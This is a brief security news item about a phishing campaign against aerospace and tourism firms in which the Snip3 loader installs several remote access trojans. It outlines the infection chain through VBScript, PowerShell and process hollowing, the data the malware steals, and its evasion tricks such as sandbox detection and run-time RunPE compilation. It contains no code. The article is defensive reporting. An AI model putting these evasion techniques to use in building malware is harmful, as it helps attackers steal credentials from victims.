Snip3 bootloader is used to install Revenge RAT, AsyncRAT, Agent Tesla and NetWire RAT on compromised systems
Microsoft has warned of an ongoing malicious phishing campaign targeting aerospace and tourism organizations. Criminals use a number of remote access Trojans installed with a new stealthy malware downloader.
The phishing emails of cybercriminals are sent ostensibly on behalf of legitimate organizations and are disguised as PDF documents containing thematic information. Links embedded in phishing messages download VB Script files that execute the PowerShell script. The latter, in turn, executes the final RAT payload using Process Hollowing.
Once installed, malware is capable of stealing credentials, taking screenshots, stealing webcam, browser and clipboard data, system and network information, and transmitting data over SMTP port 587.
The bootloader, dubbed Snip3, is used to install Revenge RAT, AsyncRAT, Agent Tesla, and NetWire RAT payloads on compromised systems.
Snip3 also has the ability to identify sandbox and virtual environments and thus avoid detection by antivirus solutions. The malware downloader also uses additional techniques to avoid detection, including:
- Executing PowerShell code with the remotesigned parameter
- using Pastebin and top4top;
- compiling RunPE loaders at the endpoint at run time.
Indicators of compromise related to the current campaign, including hashes of malware samples and domains of C&C RAT servers, can be found here.
Catch up on more stories here
Follow us on Facebook here